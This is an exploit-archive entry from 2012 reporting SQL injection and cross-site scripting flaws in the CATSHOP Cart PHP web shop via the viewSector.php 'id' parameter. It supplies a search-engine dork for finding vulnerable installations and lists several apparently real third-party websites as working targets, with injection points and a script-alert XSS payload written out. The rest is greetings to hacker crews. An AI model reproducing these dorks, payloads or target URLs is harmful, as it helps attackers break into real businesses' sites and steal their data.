ID 1337DAY-ID-17646
Type zdt
Reporter the_cyber_nuxbie
Modified 2012-03-10T00:00:00
Description
Exploit for php platform in category web applications
[ CATSHOP Cart - SQL Injection Vulnerability ]
[x] Author : the_cyber_nuxbie
[x] Home : www.thecybernuxbie.com
[x] E-mail : staff@thecybernuxbie.com
[x] Found : 10 March 2012 @ 07:54 AM.
[x] Tested : Back|Track 5.
[x] Dork : inurl:"/viewSector.php?id="
________________________________________________________________________
************************************************************************
- Info WebApps:
CATSHOP is an MNS product, fully self-managed and provided to the customer for use on our web servers.
Developed by: http://www.mns.it/site/mns/
- Exploit Report:
http://localhost/viewSector.php?id=[SQL Injection]
- Sample WebApps Vuln SQLi:
http://reinvestgroup.it/cat_shop040708/viewSector.php?id=9' + [SQL Injection]
http://globostraslochi.com/catshop230608/viewSector.php?id=63' + [SQL Injection]
http://sidermetal.biz/catshop230608/viewSector.php?id=31' + [SQL Injection]
- Exploit Concept:
http://lokalisasi/viewSector.php?id=[XSS]
- Sample Web Persistent XSS Vulnerability:
http://www.sidermetal.biz/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]
http://globostraslochi.com/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]
http://reinvestgroup.it/cat_shop040708/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]
0day no more...
"n0 d0rk f0r k1dd10ts"
- From the Heart:
I want to study at college level...
(the biggest obsession = S1 - TI)
But I cannot afford the cost...
Help Me...!!!
- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...
- Greetz To All Exploiters From Indonesian:
[ Member Of Inj3ct0r & Exploit-DB ]
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,
eidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,
k4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe,
NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,
team_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc...
"You Have Brought Honor To The Name Of INDONESIA In The IT-Underground World"
Me @ March, 10 2012, GMT +07:54 Solo Raya, Indonesian.
# 0day.today [2018-02-09] #